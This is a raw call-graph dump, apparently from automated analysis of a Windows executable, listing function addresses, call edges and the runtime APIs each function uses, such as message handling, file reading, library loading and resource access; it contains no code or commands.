108586->108578 108590 410f2a 108586->108590 108587 410ce4 108587->108578 108772 411070 10 API calls Mailbox 108587->108772 108588->108651 108776 409e5d 60 API calls 108588->108776 108777 456349 331 API calls 108588->108777 108589 444e81 Sleep 108589->108651 108592 445c58 TranslateMessage DispatchMessageW GetMessageW 108590->108592 108592->108592 108593 445c88 108592->108593 108593->108578 108594 409e5d 60 API calls 108594->108651 108595 410e43 PeekMessageW 108595->108651 108596 410ea5 TranslateMessage DispatchMessageW 108596->108595 108597 444d50 TranslateAcceleratorW 108597->108595 108597->108651 108598 44581f WaitForSingleObject 108604 44583c GetExitCodeProcess CloseHandle 108598->108604 108598->108651 108600 410d13 timeGetTime 108600->108651 108601 410e5f Sleep 108637 410e70 Mailbox 108601->108637 108602 408047 59 API calls 108602->108651 108636 410f95 108604->108636 108605 445af8 Sleep 108605->108637 108607 420db6 59 API calls Mailbox 108607->108651 108608 40b73c 304 API calls 108608->108651 108610 42049f timeGetTime 108610->108637 108611 410f4e timeGetTime 108774 409e5d 60 API calls 108611->108774 108614 445b8f GetExitCodeProcess 108617 445ba5 WaitForSingleObject 108614->108617 108618 445bbb CloseHandle 108614->108618 108616 40b7dd 109 API calls 108616->108637 108617->108618 108617->108651 108618->108637 108621 485f25 110 API calls 108621->108637 108622 445874 108622->108636 108623 445078 Sleep 108623->108651 108624 445c17 Sleep 108624->108651 108630 409ea0 304 API calls 108630->108651 108633 40fce0 304 API calls 108633->108651 108636->108485 108637->108610 108637->108614 108637->108616 108637->108621 108637->108622 108637->108623 108637->108624 108637->108636 108637->108651 108802 407667 108637->108802 108807 462408 60 API calls 108637->108807 108808 409e5d 60 API calls 108637->108808 108809 407de1 108637->108809 108813 4089b3 69 API calls Mailbox 108637->108813 108814 40b73c 331 API calls 108637->108814 108815 4564da 60 API calls 108637->108815 108816 465244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 108637->108816 108817 463c55 66 API calls Mailbox 108637->108817 108638 469e4a 89 API calls 108638->108651 108640 4084c0 69 API calls 108640->108651 108641 409c90 59 API calls Mailbox 108641->108651 108643 407de1 59 API calls 108643->108651 108644 4089b3 69 API calls 108644->108651 108645 45617e 59 API calls Mailbox 108645->108651 108646 4455d5 VariantClear 108646->108651 108647 44566b VariantClear 108647->108651 108648 456e8f 59 API calls 108648->108651 108649 408cd4 59 API calls Mailbox 108649->108651 108650 445419 VariantClear 108650->108651 108651->108583 108651->108587 108651->108589 108651->108594 108651->108595 108651->108596 108651->108597 108651->108598 108651->108600 108651->108601 108651->108602 108651->108605 108651->108607 108651->108608 108651->108611 108651->108630 108651->108633 108651->108636 108651->108637 108651->108638 108651->108640 108651->108641 108651->108643 108651->108644 108651->108645 108651->108646 108651->108647 108651->108648 108651->108649 108651->108650 108714 40e420 108651->108714 108721 40e6a0 108651->108721 108752 40f460 108651->108752 108771 4031ce IsDialogMessageW GetClassLongW 108651->108771 108778 486018 59 API calls 108651->108778 108779 469a15 59 API calls Mailbox 108651->108779 108780 45d4f2 59 API calls 108651->108780 108781 409837 108651->108781 108799 4560ef 59 API calls 2 library calls 108651->108799 108800 408401 59 API calls 108651->108800 108801 4082df 59 API calls Mailbox 108651->108801 108652->108509 108653->108514 108654->108510 108655->108510 108657 409ebf 108656->108657 108676 409eed Mailbox 108656->108676 108658 420db6 Mailbox 59 API calls 108657->108658 108658->108676 108659 40b475 108660 408047 59 API calls 108659->108660 108675 40a057 108660->108675 108661 40b47a 108662 4409e5 108661->108662 108663 440055 108661->108663 110074 469e4a 89 API calls 4 library calls 108662->110074 110071 469e4a 89 API calls 4 library calls 108663->110071 108664 420db6 59 API calls Mailbox 108664->108676 108668 422d40 67 API calls __cinit 108668->108676 108669 440064 108669->108460 108672 408047 59 API calls 108672->108676 108673 407667 59 API calls 108673->108676 108674 456e8f 59 API calls 108674->108676 108675->108460 108676->108659 108676->108661 108676->108663 108676->108664 108676->108668 108676->108672 108676->108673 108676->108674 108676->108675 108677 4409d6 108676->108677 108679 40a55a 108676->108679 110069 40c8c0 331 API calls 2 library calls 108676->110069 110070 40b900 60 API calls Mailbox 108676->110070 110073 469e4a 89 API calls 4 library calls 108677->110073 110072 469e4a 89 API calls 4 library calls 108679->110072 108680->108514 108681->108439 108682->108494 108683->108448 108684->108494 108685->108494 108686->108452 108687->108462 108688->108463 108689->108463 108690->108466 108691->108468 108692->108510 108693->108510 108694->108510 108695->108510 108697 4084cb 108696->108697 108698 4084f2 108697->108698 110075 4089b3 69 API calls Mailbox 108697->110075 108698->108493 108700->108494 108701->108492 108703 408052 108702->108703 108704 40805a 108702->108704 110076 407f77 59 API calls 2 library calls 108703->110076 108704->108502 108706->108446 108707->108494 108709 407e62 108708->108709 108711 407e5f _memmove 108708->108711 108710 420db6 Mailbox 59 API calls 108709->108710 108710->108711 108711->108562 108712->108566 108713->108573 108715 40e451 108714->108715 108716 40e43d 108714->108716 108819 469e4a 89 API calls 4 library calls 108715->108819 108818 40df00 331 API calls 2 library calls 108716->108818 108719 40e448 108719->108651 108720 443aa4 108720->108720 108722 40e6d5 108721->108722 108723 443aa9 108722->108723 108726 40e73f 108722->108726 108735 40e799 108722->108735 108724 409ea0 331 API calls 108723->108724 108725 443abe 108724->108725 108742 40e970 Mailbox 108725->108742 108821 469e4a 89 API calls 4 library calls 108725->108821 108729 407667 59 API calls 108726->108729 108726->108735 108727 407667 59 API calls 108727->108735 108730 443b04 108729->108730 108822 422d40 108730->108822 108731 422d40 __cinit 67 API calls 108731->108735 108733 443b26 108733->108651 108734 4084c0 69 API calls 108734->108742 108735->108727 108735->108731 108735->108733 108736 40e95a 108735->108736 108735->108742 108736->108742 108825 469e4a 89 API calls 4 library calls 108736->108825 108737 409ea0 331 API calls 108737->108742 108739 408d40 59 API calls 108739->108742 108742->108734 108742->108737 108742->108739 108743 40f195 108742->108743 108749 40ea78 108742->108749 108751 469e4a 89 API calls 108742->108751 108820 407f77 59 API calls 2 library calls 108742->108820 108826 456e8f 59 API calls 108742->108826 108827 47c5c3 331 API calls 108742->108827 108828 47b53c 331 API calls Mailbox 108742->108828 108830 409c90 59 API calls Mailbox 108742->108830 108831 4793c6 331 API calls Mailbox 108742->108831 108829 469e4a 89 API calls 4 library calls 108743->108829 108749->108651 108750 443e25 108750->108651 108751->108742 108753 40f650 108752->108753 108754 40f4ba 108752->108754 108757 407de1 59 API calls 108753->108757 108755 40f4c6 108754->108755 108756 44441e 108754->108756 109008 40f290 331 API calls 2 library calls 108755->109008 109010 47bc6b 108756->109010 108763 40f58c Mailbox 108757->108763 108760 44442c 108764 40f630 108760->108764 109050 469e4a 89 API calls 4 library calls 108760->109050 108762 40f4fd 108762->108760 108762->108763 108762->108764 108910 46cb7a 108763->108910 108990 404e4a 108763->108990 108996 463c37 108763->108996 108999 47445a 108763->108999 108764->108651 108766 40f5e3 108766->108764 109009 409c90 59 API calls Mailbox 108766->109009 108771->108651 108772->108580 108773->108586 108774->108651 108775->108588 108776->108588 108777->108588 108778->108651 108779->108651 108780->108651 108782 409851 108781->108782 108791 40984b 108781->108791 108783 43f4da 108782->108783 108784 409899 108782->108784 108785 43f5d3 __i64tow 108782->108785 108787 409857 __itow 108782->108787 108793 420db6 Mailbox 59 API calls 108783->108793 108797 43f552 Mailbox _wcscpy 108783->108797 110067 423698 83 API calls 3 library calls 108784->110067 108785->108785 108789 420db6 Mailbox 59 API calls 108787->108789 108790 409871 108789->108790 108790->108791 108792 407de1 59 API calls 108790->108792 108791->108651 108792->108791 108794 43f51f 108793->108794 108795 420db6 Mailbox 59 API calls 108794->108795 108796 43f545 108795->108796 108796->108797 108798 407de1 59 API calls 108796->108798 110068 423698 83 API calls 3 library calls 108797->110068 108798->108797 108799->108651 108800->108651 108801->108651 108803 420db6 Mailbox 59 API calls 108802->108803 108804 407688 108803->108804 108805 420db6 Mailbox 59 API calls 108804->108805 108806 407696 108805->108806 108806->108637 108807->108637 108808->108637 108810 407df0 __wsetenvp _memmove 108809->108810 108811 420db6 Mailbox 59 API calls 108810->108811 108812 407e2e 108811->108812 108812->108637 108813->108637 108814->108637 108815->108637 108816->108637 108817->108637 108818->108719 108819->108720 108820->108742 108821->108742 108832 422c44 108822->108832 108824 422d4b 108824->108735 108825->108742 108826->108742 108827->108742 108828->108742 108829->108750 108830->108742 108831->108742 108833 422c50 __setmode 108832->108833 108840 423217 108833->108840 108839 422c77 __setmode 108839->108824 108857 429c0b 108840->108857 108842 422c59 108843 422c88 DecodePointer DecodePointer 108842->108843 108844 422c65 108843->108844 108845 422cb5 108843->108845 108854 422c82 108844->108854 108845->108844 108903 4287a4 59 API calls __setmode 108845->108903 108847 422d18 EncodePointer EncodePointer 108847->108844 108848 422cec 108848->108844 108853 422d06 EncodePointer 108848->108853 108905 428864 61 API calls 2 library calls 108848->108905 108849 422cc7 108849->108847 108849->108848 108904 428864 61 API calls 2 library calls 108849->108904 108852 422d00 108852->108844 108852->108853 108853->108847 108906 423220 108854->108906 108858 429c2f EnterCriticalSection 108857->108858 108859 429c1c 108857->108859 108858->108842 108864 429c93 108859->108864 108861 429c22 108861->108858 108888 4230b5 58 API calls 3 library calls 108861->108888 108865 429c9f __setmode 108864->108865 108866 429cc0 108865->108866 108867 429ca8 108865->108867 108875 429ce1 __setmode 108866->108875 108892 42881d 58 API calls 2 library calls 108866->108892 108889 42a16b 58 API calls 2 library calls 108867->108889 108870 429cad 108890 42a1c8 58 API calls 8 library calls 108870->108890 108871 429cd5 108873 429ceb 108871->108873 108874 429cdc 108871->108874 108878 429c0b __lock 58 API calls 108873->108878 108893 428b28 58 API calls __getptd_noexit 108874->108893 108875->108861 108876 429cb4 108891 42309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 108876->108891 108880 429cf2 108878->108880 108882 429d17 108880->108882 108883 429cff 108880->108883 108895 422d55 108882->108895 108894 429e2b InitializeCriticalSectionAndSpinCount 108883->108894 108886 429d0b 108901 429d33 LeaveCriticalSection _doexit 108886->108901 108889->108870 108890->108876 108892->108871 108893->108875 108894->108886 108896 422d87 _free 108895->108896 108897 422d5e RtlFreeHeap 108895->108897 108896->108886 108897->108896 108898 422d73 108897->108898 108902 428b28 58 API calls __getptd_noexit 108898->108902 108900 422d79 GetLastError 108900->108896 108901->108875 108902->108900 108903->108849 108904->108848 108905->108852 108909 429d75 LeaveCriticalSection 108906->108909 108908 422c87 108908->108839 108909->108908 108911 407667 59 API calls 108910->108911 108912 46cbaf 108911->108912 108913 407667 59 API calls 108912->108913 108914 46cbb8 108913->108914 108915 46cbcc 108914->108915 109247 409b3c 108914->109247 108917 409837 84 API calls 108915->108917 108918 46cbe9 108917->108918 108919 46ccea 108918->108919 108920 46cc0b 108918->108920 108989 46cd1a Mailbox 108918->108989 109051 404ddd 108919->109051 108922 409837 84 API calls 108920->108922 108923 46cc17 108922->108923 108925 408047 59 API calls 108923->108925 108927 46cc23 108925->108927 108926 46cd16 108929 407667 59 API calls 108926->108929 108926->108989 108932 46cc37 108927->108932 108933 46cc69 108927->108933 108928 404ddd 136 API calls 108928->108926 108930 46cd4b 108929->108930 108931 407667 59 API calls 108930->108931 108934 46cd54 108931->108934 108936 408047 59 API calls 108932->108936 108937 409837 84 API calls 108933->108937 108935 407667 59 API calls 108934->108935 108938 46cd5d 108935->108938 108939 46cc47 108936->108939 108940 46cc76 108937->108940 108942 407667 59 API calls 108938->108942 109251 407cab 108939->109251 108941 408047 59 API calls 108940->108941 108944 46cc82 108941->108944 108945 46cd66 108942->108945 109258 464a31 GetFileAttributesW 108944->109258 108948 409837 84 API calls 108945->108948 108951 46cd73 108948->108951 108949 409837 84 API calls 108952 46cc5d 108949->108952 108950 46cc8b 108953 46cc9e 108950->108953 108956 4079f2 59 API calls 108950->108956 109075 40459b 108951->109075 108955 407b2e 59 API calls 108952->108955 108958 409837 84 API calls 108953->108958 108964 46cca4 108953->108964 108955->108933 108956->108953 108957 46cd8e 109126 4079f2 108957->109126 108960 46cccb 108958->108960 109259 4637ef 75 API calls Mailbox 108960->109259 108963 46cdd1 108965 408047 59 API calls 108963->108965 108964->108989 108967 46cddf 108965->108967 108966 4079f2 59 API calls 108968 46cdae 108966->108968 109129 407b2e 108967->109129 108968->108963 109260 407bcc 108968->109260 108972 407b2e 59 API calls 108975 46cdfb 108972->108975 108973 46cdc3 108974 407bcc 59 API calls 108973->108974 108974->108963 108976 407b2e 59 API calls 108975->108976 108977 46ce09 108976->108977 108978 409837 84 API calls 108977->108978 108979 46ce15 108978->108979 109138 464071 108979->109138 108981 46ce26 108982 463c37 3 API calls 108981->108982 108983 46ce30 108982->108983 108984 409837 84 API calls 108983->108984 108988 46ce61 108983->108988 108985 46ce4e 108984->108985 109192 469155 108985->109192 108987 404e4a 84 API calls 108987->108989 108988->108987 108989->108766 108991 404e54 108990->108991 108993 404e5b 108990->108993 108992 4253a6 __fcloseall 83 API calls 108991->108992 108992->108993 108994 404e6a 108993->108994 108995 404e7b FreeLibrary 108993->108995 108994->108766 108995->108994 110010 46445a GetFileAttributesW 108996->110010 109000 409837 84 API calls 108999->109000 109001 474494 109000->109001 110014 406240 109001->110014 109003 4744a4 109004 409ea0 331 API calls 109003->109004 109005 4744c9 109003->109005 109004->109005 109007 4744cd 109005->109007 110039 409a98 59 API calls Mailbox 109005->110039 109007->108766 109008->108762 109009->108766 109011 47bc96 109010->109011 109012 47bcb0 109010->109012 110059 469e4a 89 API calls 4 library calls 109011->110059 110060 47a213 59 API calls Mailbox 109012->110060 109015 47bcbb 109016 409ea0 330 API calls 109015->109016 109017 47bd1c 109016->109017 109018 47bdae 109017->109018 109022 47bd5d 109017->109022 109043 47bca8 Mailbox 109017->109043 109019 47be04 109018->109019 109020 47bdb4 109018->109020 109021 409837 84 API calls 109019->109021 109019->109043 110062 46791a 59 API calls 109020->110062 109023 47be16 109021->109023 110061 4672df 59 API calls Mailbox 109022->110061 109026 407e4f 59 API calls 109023->109026 109030 47be3a CharUpperBuffW 109026->109030 109027 47bdd7 110063 405d41 59 API calls Mailbox 109027->110063 109029 47bd8d 109032 40f460 330 API calls 109029->109032 109033 47be54 109030->109033 109031 47bddf Mailbox 109036 40fce0 330 API calls 109031->109036 109032->109043 109034 47bea7 109033->109034 109035 47be5b 109033->109035 109037 409837 84 API calls 109034->109037 110064 4672df 59 API calls Mailbox 109035->110064 109036->109043 109038 47beaf 109037->109038 110065 409e5d 60 API calls 109038->110065 109041 47be89 109042 40f460 330 API calls 109041->109042 109042->109043 109043->108760 109044 47beb9 109044->109043 109045 409837 84 API calls 109044->109045 109046 47bed4 109045->109046 110066 405d41 59 API calls Mailbox 109046->110066 109048 47bee4 109049 40fce0 330 API calls 109048->109049 109049->109043 109050->108764 109269 404bb5 109051->109269 109056 43d8e6 109058 404e4a 84 API calls 109056->109058 109057 404e08 LoadLibraryExW 109279 404b6a 109057->109279 109060 43d8ed 109058->109060 109063 404b6a 3 API calls 109060->109063 109065 43d8f5 109063->109065 109064 404e2f 109064->109065 109066 404e3b 109064->109066 109305 404f0b 109065->109305 109067 404e4a 84 API calls 109066->109067 109069 404e40 109067->109069 109069->108926 109069->108928 109072 43d91c 109313 404ec7 109072->109313 109076 407667 59 API calls 109075->109076 109077 4045b1 109076->109077 109078 407667 59 API calls 109077->109078 109079 4045b9 109078->109079 109080 407667 59 API calls 109079->109080 109081 4045c1 109080->109081 109082 407667 59 API calls 109081->109082 109083 4045c9 109082->109083 109084 43d4d2 109083->109084 109085 4045fd 109083->109085 109086 408047 59 API calls 109084->109086 109087 40784b 59 API calls 109085->109087 109088 43d4db 109086->109088 109089 40460b 109087->109089 109617 407d8c 109088->109617 109613 407d2c 109089->109613 109092 404615 109093 404640 109092->109093 109094 40784b 59 API calls 109092->109094 109096 43d4fb 109093->109096 109097 40465f 109093->109097 109113 404680 109093->109113 109098 404636 109094->109098 109101 43d5cb 109096->109101 109108 43d5b4 109096->109108 109120 43d532 109096->109120 109099 4079f2 59 API calls 109097->109099 109102 407d2c 59 API calls 109098->109102 109104 404669 109099->109104 109100 404691 109105 4046a3 109100->109105 109106 408047 59 API calls 109100->109106 109103 407bcc 59 API calls 109101->109103 109102->109093 109121 43d588 109103->109121 109111 40784b 59 API calls 109104->109111 109104->109113 109107 408047 59 API calls 109105->109107 109109 4046b3 109105->109109 109106->109105 109107->109109 109108->109101 109116 43d59f 109108->109116 109110 4046ba 109109->109110 109112 408047 59 API calls 109109->109112 109114 408047 59 API calls 109110->109114 109123 4046c1 Mailbox 109110->109123 109111->109113 109112->109110 109600 40784b 109113->109600 109114->109123 109115 4079f2 59 API calls 109115->109121 109119 407bcc 59 API calls 109116->109119 109117 43d590 109118 407bcc 59 API calls 109117->109118 109118->109121 109119->109121 109120->109117 109124 43d57b 109120->109124 109121->109113 109121->109115 109621 407924 59 API calls 2 library calls 109121->109621 109123->108957 109125 407bcc 59 API calls 109124->109125 109125->109121 109127 407e4f 59 API calls 109126->109127 109128 4079fd 109127->109128 109128->108963 109128->108966 109130 407b40 109129->109130 109131 43ec6b 109129->109131 109629 407a51 109130->109629 109635 457bdb 59 API calls _memmove 109131->109635 109134 407b4c 109134->108972 109135 43ec75 109136 408047 59 API calls 109135->109136 109137 43ec7d Mailbox 109136->109137 109139 46408d 109138->109139 109140 464092 109139->109140 109141 4640a0 109139->109141 109143 408047 59 API calls 109140->109143 109142 407667 59 API calls 109141->109142 109144 4640a8 109142->109144 109191 46409b Mailbox 109143->109191 109145 407667 59 API calls 109144->109145 109146 4640b0 109145->109146 109147 407667 59 API calls 109146->109147 109148 4640bb 109147->109148 109149 407667 59 API calls 109148->109149 109150 4640c3 109149->109150 109151 407667 59 API calls 109150->109151 109152 4640cb 109151->109152 109153 407667 59 API calls 109152->109153 109154 4640d3 109153->109154 109155 407667 59 API calls 109154->109155 109156 4640db 109155->109156 109157 407667 59 API calls 109156->109157 109158 4640e3 109157->109158 109159 40459b 59 API calls 109158->109159 109160 4640fa 109159->109160 109191->108981 109193 469162 __ftell_nolock 109192->109193 109194 420db6 Mailbox 59 API calls 109193->109194 109195 4691bf 109194->109195 109196 40522e 59 API calls 109195->109196 109197 4691c9 109196->109197 109198 468f5f GetSystemTimeAsFileTime 109197->109198 109199 4691d4 109198->109199 109200 404ee5 85 API calls 109199->109200 109201 4691e7 _wcscmp 109200->109201 109202 46920b 109201->109202 109203 4692b8 109201->109203 109668 469734 109202->109668 109205 469734 96 API calls 109203->109205 109248 409b52 109247->109248 109249 409b4d 109247->109249 109248->108915 109249->109248 110004 42358a 59 API calls 109249->110004 109252 43ed4a 109251->109252 109253 407cbf 109251->109253 109254 408029 59 API calls 109252->109254 110005 407c50 109253->110005 109257 43ed55 __wsetenvp _memmove 109254->109257 109256 407cca 109256->108949 109258->108950 109259->108964 109261 407c45 109260->109261 109262 407bd8 __wsetenvp 109260->109262 109263 407d2c 59 API calls 109261->109263 109264 407c13 109262->109264 109265 407bee 109262->109265 109268 407bf6 _memmove 109263->109268 109267 408029 59 API calls 109264->109267 109266 407f27 59 API calls 109265->109266 109266->109268 109267->109268 109268->108973 109318 404c03 109269->109318 109272 404c03 2 API calls 109275 404bdc 109272->109275 109273 404bf5 109276 42525b 109273->109276 109274 404bec FreeLibrary 109274->109273 109275->109273 109275->109274 109322 425270 109276->109322 109278 404dfc 109278->109056 109278->109057 109403 404c36 109279->109403 109282 404b8f 109284 404ba1 FreeLibrary 109282->109284 109285 404baa 109282->109285 109283 404c36 2 API calls 109283->109282 109284->109285 109286 404c70 109285->109286 109287 420db6 Mailbox 59 API calls 109286->109287 109288 404c85 109287->109288 109407 40522e 109288->109407 109290 404c91 _memmove 109291 404ccc 109290->109291 109292 404dc1 109290->109292 109293 404d89 109290->109293 109294 404ec7 69 API calls 109291->109294 109421 46991b 95 API calls 109292->109421 109410 404e89 CreateStreamOnHGlobal 109293->109410 109302 404cd5 109294->109302 109297 404f0b 74 API calls 109297->109302 109298 404d69 109298->109064 109300 43d8a7 109301 404ee5 85 API calls 109300->109301 109303 43d8bb 109301->109303 109302->109297 109302->109298 109302->109300 109416 404ee5 109302->109416 109304 404f0b 74 API calls 109303->109304 109304->109298 109306 404f1d 109305->109306 109307 43d9cd 109305->109307 109445 4255e2 109306->109445 109310 469109 109577 468f5f 109310->109577 109312 46911f 109312->109072 109314 43d990 109313->109314 109315 404ed6 109313->109315 109582 425c60 109315->109582 109317 404ede 109319 404bd0 109318->109319 109320 404c0c LoadLibraryA 109318->109320 109319->109272 109319->109275 109320->109319 109321 404c1d GetProcAddress 109320->109321 109321->109319 109323 42527c __setmode 109322->109323 109324 42528f 109323->109324 109326 4252c0 109323->109326 109371 428b28 58 API calls __getptd_noexit 109324->109371 109341 4304e8 109326->109341 109327 425294 109372 428db6 9 API calls __setmode 109327->109372 109330 4252c5 109331 4252db 109330->109331 109332 4252ce 109330->109332 109334 425305 109331->109334 109335 4252e5 109331->109335 109373 428b28 58 API calls __getptd_noexit 109332->109373 109356 430607 109334->109356 109374 428b28 58 API calls __getptd_noexit 109335->109374 109336 42529f @_EH4_CallFilterFunc@8 __setmode 109336->109278 109342 4304f4 __setmode 109341->109342 109343 429c0b __lock 58 API calls 109342->109343 109354 430502 109343->109354 109344 430576 109376 4305fe 109344->109376 109345 43057d 109381 42881d 58 API calls 2 library calls 109345->109381 109348 430584 109348->109344 109382 429e2b InitializeCriticalSectionAndSpinCount 109348->109382 109349 4305f3 __setmode 109349->109330 109351 429c93 __mtinitlocknum 58 API calls 109351->109354 109353 4305aa EnterCriticalSection 109353->109344 109354->109344 109354->109345 109354->109351 109379 426c50 59 API calls __lock 109354->109379 109380 426cba LeaveCriticalSection LeaveCriticalSection _doexit 109354->109380 109364 430627 __wopenfile 109356->109364 109357 430641 109387 428b28 58 API calls __getptd_noexit 109357->109387 109359 430646 109388 428db6 9 API calls __setmode 109359->109388 109361 425310 109375 425332 LeaveCriticalSection LeaveCriticalSection __wfsopen 109361->109375 109362 43085f 109384 4385a1 109362->109384 109364->109357 109370 4307fc 109364->109370 109389 4237cb 60 API calls 2 library calls 109364->109389 109366 4307f5 109366->109370 109390 4237cb 60 API calls 2 library calls 109366->109390 109368 430814 109368->109370 109391 4237cb 60 API calls 2 library calls 109368->109391 109370->109357 109370->109362 109371->109327 109372->109336 109373->109336 109374->109336 109375->109336 109383 429d75 LeaveCriticalSection 109376->109383 109378 430605 109378->109349 109379->109354 109380->109354 109381->109348 109382->109353 109383->109378 109392 437d85 109384->109392 109386 4385ba 109386->109361 109387->109359 109388->109361 109389->109366 109390->109368 109391->109370 109395 437d91 __setmode 109392->109395 109393 437da7 109394 428b28 __setmode 58 API calls 109393->109394 109396 437dac 109394->109396 109395->109393 109397 437ddd 109395->109397 109398 428db6 __setmode 9 API calls 109396->109398 109399 437e4e __wsopen_nolock 109 API calls 109397->109399 109402 437db6 __setmode 109398->109402 109400 437df9 109399->109400 109401 437e22 __wsopen_helper LeaveCriticalSection 109400->109401 109401->109402 109402->109386 109404 404b83 109403->109404 109405 404c3f LoadLibraryA 109403->109405 109404->109282 109404->109283 109405->109404 109406 404c50 GetProcAddress 109405->109406 109406->109404 109408 420db6 Mailbox 59 API calls 109407->109408 109409 405240 109408->109409 109409->109290 109411 404ea3 FindResourceExW 109410->109411 109415 404ec0 109410->109415 109412 43d933 LoadResource 109411->109412 109411->109415 109413 43d948 SizeofResource 109412->109413 109412->109415 109414 43d95c LockResource 109413->109414 109413->109415 109414->109415 109415->109291 109417 404ef4 109416->109417 109418 43d9ab 109416->109418 109422 42584d 109417->109422 109420 404f02 109420->109302 109421->109291 109423 425859 __setmode 109422->109423 109424 42586b 109423->109424 109426 425891 109423->109426 109435 428b28 58 API calls __getptd_noexit 109424->109435 109437 426c11 109426->109437 109427 425870 109436 428db6 9 API calls __setmode 109427->109436 109432 4258a6 109444 4258c8 LeaveCriticalSection LeaveCriticalSection __wfsopen 109432->109444 109434 42587b __setmode 109434->109420 109435->109427 109436->109434 109438 426c43 EnterCriticalSection 109437->109438 109439 426c21 109437->109439 109441 425897 109438->109441 109439->109438 109440 426c29 109439->109440 109442 429c0b __lock 58 API calls 109440->109442 109443 4257be 83 API calls 5 library calls 109441->109443 109442->109441 109443->109432 109444->109434 109448 4255fd 109445->109448 109447 404f2e 109447->109310 109449 425609 __setmode 109448->109449 109450 42564c 109449->109450 109451 425644 __setmode 109449->109451 109456 42561f _memset 109449->109456 109452 426c11 __lock_file 59 API calls 109450->109452 109451->109447 109453 425652 109452->109453 109461 42541d 109453->109461 109475 428b28 58 API calls __getptd_noexit 109456->109475 109457 425639 109476 428db6 9 API calls __setmode 109457->109476 109465 425438 _memset 109461->109465 109467 425453 109461->109467 109462 425443 109573 428b28 58 API calls __getptd_noexit 109462->109573 109464 425448 109574 428db6 9 API calls __setmode 109464->109574 109465->109462 109465->109467 109472 425493 109465->109472 109477 425686 LeaveCriticalSection LeaveCriticalSection __wfsopen 109467->109477 109469 4255a4 _memset 109576 428b28 58 API calls __getptd_noexit 109469->109576 109472->109467 109472->109469 109478 4246e6 109472->109478 109485 430e5b 109472->109485 109553 430ba7 109472->109553 109575 430cc8 58 API calls 3 library calls 109472->109575 109475->109457 109476->109451 109477->109451 109479 4246f0 109478->109479 109480 424705 109478->109480 109481 428b28 __setmode 58 API calls 109479->109481 109480->109472 109482 4246f5 109481->109482 109483 428db6 __setmode 9 API calls 109482->109483 109484 424700 109483->109484 109484->109472 109486 430e93 109485->109486 109487 430e7c 109485->109487 109489 4315cb 109486->109489 109493 430ecd 109486->109493 109488 428af4 __free_osfhnd 58 API calls 109487->109488 109490 430e81 109488->109490 109491 428af4 __free_osfhnd 58 API calls 109489->109491 109492 428b28 __setmode 58 API calls 109490->109492 109494 4315d0 109491->109494 109533 430e88 109492->109533 109495 430ed5 109493->109495 109502 430eec 109493->109502 109496 428b28 __setmode 58 API calls 109494->109496 109498 428af4 __free_osfhnd 58 API calls 109495->109498 109497 430ee1 109496->109497 109500 428db6 __setmode 9 API calls 109497->109500 109499 430eda 109498->109499 109505 428b28 __setmode 58 API calls 109499->109505 109500->109533 109501 430f01 109503 428af4 __free_osfhnd 58 API calls 109501->109503 109502->109501 109504 430f1b 109502->109504 109506 430f39 109502->109506 109502->109533 109503->109499 109504->109501 109510 430f26 109504->109510 109505->109497 109507 42881d __malloc_crt 58 API calls 109506->109507 109508 430f49 109507->109508 109511 430f51 109508->109511 109512 430f6c 109508->109512 109509 435c6b __flsbuf 58 API calls 109513 43103a 109509->109513 109510->109509 109514 428b28 __setmode 58 API calls 109511->109514 109516 4318c1 __lseeki64_nolock 60 API calls 109512->109516 109515 4310b3 ReadFile 109513->109515 109520 431050 GetConsoleMode 109513->109520 109517 430f56 109514->109517 109518 431593 GetLastError 109515->109518 109519 4310d5 109515->109519 109516->109510 109521 428af4 __free_osfhnd 58 API calls 109517->109521 109522 4315a0 109518->109522 109523 431093 109518->109523 109519->109518 109527 4310a5 109519->109527 109524 4310b0 109520->109524 109525 431064 109520->109525 109521->109533 109526 428b28 __setmode 58 API calls 109522->109526 109531 428b07 __dosmaperr 58 API calls 109523->109531 109535 431099 109523->109535 109524->109515 109525->109524 109528 43106a ReadConsoleW 109525->109528 109529 4315a5 109526->109529 109527->109535 109537 43110a 109527->109537 109546 431377 109527->109546 109528->109527 109530 43108d GetLastError 109528->109530 109532 428af4 __free_osfhnd 58 API calls 109529->109532 109530->109523 109531->109535 109532->109535 109533->109472 109534 422d55 _free 58 API calls 109534->109533 109535->109533 109535->109534 109536 431264 MultiByteToWideChar 109536->109530 109536->109535 109538 431176 ReadFile 109537->109538 109544 4311f7 109537->109544 109541 431197 GetLastError 109538->109541 109548 4311a1 109538->109548 109540 43147d ReadFile 109547 4314a0 GetLastError 109540->109547 109552 4314ae 109540->109552 109541->109548 109542 4312b4 109542->109536 109549 4318c1 __lseeki64_nolock 60 API calls 109542->109549 109543 4312a4 109545 428b28 __setmode 58 API calls 109543->109545 109544->109535 109544->109536 109544->109542 109544->109543 109545->109535 109546->109535 109546->109540 109547->109552 109548->109537 109550 4318c1 __lseeki64_nolock 60 API calls 109548->109550 109549->109536 109550->109548 109551 4318c1 __lseeki64_nolock 60 API calls 109551->109552 109552->109546 109552->109551 109554 430bb2 109553->109554 109555 430bc7 109553->109555 109556 428b28 __setmode 58 API calls 109554->109556 109559 430bfc 109555->109559 109560 435fe4 __getbuf 58 API calls 109555->109560 109564 430bc2 109555->109564 109557 430bb7 109556->109557 109558 428db6 __setmode 9 API calls 109557->109558 109558->109564 109561 4246e6 __flsbuf 58 API calls 109559->109561 109560->109559 109562 430c10 109561->109562 109563 430d47 __read 72 API calls 109562->109563 109565 430c17 109563->109565 109564->109472 109565->109564 109566 4246e6 __flsbuf 58 API calls 109565->109566 109567 430c3a 109566->109567 109567->109564 109568 4246e6 __flsbuf 58 API calls 109567->109568 109569 430c46 109568->109569 109569->109564 109570 4246e6 __flsbuf 58 API calls 109569->109570 109571 430c53 109570->109571 109572 4246e6 __flsbuf 58 API calls 109571->109572 109572->109564 109573->109464 109574->109467 109575->109472 109576->109464 109580 42520a GetSystemTimeAsFileTime 109577->109580 109579 468f6e 109579->109312 109581 425238 __aulldiv 109580->109581 109581->109579 109583 425c6c __setmode 109582->109583 109584 425c93 109583->109584 109585 425c7e 109583->109585 109586 426c11 __lock_file 59 API calls 109584->109586 109596 428b28 58 API calls __getptd_noexit 109585->109596 109588 425c99 109586->109588 109598 4258d0 67 API calls 6 library calls 109588->109598 109589 425c83 109597 428db6 9 API calls __setmode 109589->109597 109592 425ca4 109599 425cc4 LeaveCriticalSection LeaveCriticalSection __wfsopen 109592->109599 109593 425c8e __setmode 109593->109317 109595 425cb6 109595->109593 109596->109589 109597->109593 109598->109592 